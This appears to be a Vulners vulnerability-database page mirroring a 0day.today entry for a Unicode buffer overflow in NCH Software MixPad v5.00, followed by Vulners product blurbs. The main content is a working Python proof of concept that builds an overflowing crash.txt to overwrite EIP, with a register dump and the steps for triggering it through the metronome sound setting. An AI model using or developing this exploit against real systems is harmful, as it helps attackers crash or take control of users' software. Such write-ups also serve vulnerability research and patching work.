Lucene search
K

MixPad 5.00 - Buffer Overflow Exploit

🗓️ 23 Jan 2018 00:00:00Reported by bzyoType 
zdt
 zdt
🔗 0day.today👁 21 Views

NCH Software MixPad v5.00 - Unicode Buffer Overflow Exploit for Windows X

Code
#!/usr/bin/python
 
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: NCH Software MixPad v5.00 - Unicode Buffer Overflow
# Date: 21-01-2017
# Vulnerable Software: NCH Software MixPad
# Vendor Homepage: http://www.nch.com.au/mixpad
# Version: v5.00
# Software Link: http://www.nch.com.au/mixpad/mpsetup.exe
# Tested On: Windows XP
#
#
# PoC: generate crash.txt, options, metronome tab, paste crash.txt in 'choose a custom metronome sound' 
#
# no unicode jmp/call to esp
# 
# EAX 00117700
# ECX 001167F0
# EDX 7C90E514 ntdll.KiFastSystemCallRet
# EBX 00000000
# ESP 00116C40 UNICODE "BBBBBB does not exist or cannot be accessed."
# EBP 00116FAC
# ESI 0000004E
# EDI 00117740
# EIP 00CC00CC
 
filename="crash.txt"
  
junk = "A"*251
eip = "\xcc"*2              #eip over; jmp/call esp goes here
fill = "B"*100              #only 6 used in esp
buffer = junk + eip + fill
 
   
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

#  0day.today [2018-04-12]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Jan 2018 00:00Current
0.2Low risk
Vulners AI Score0.2
21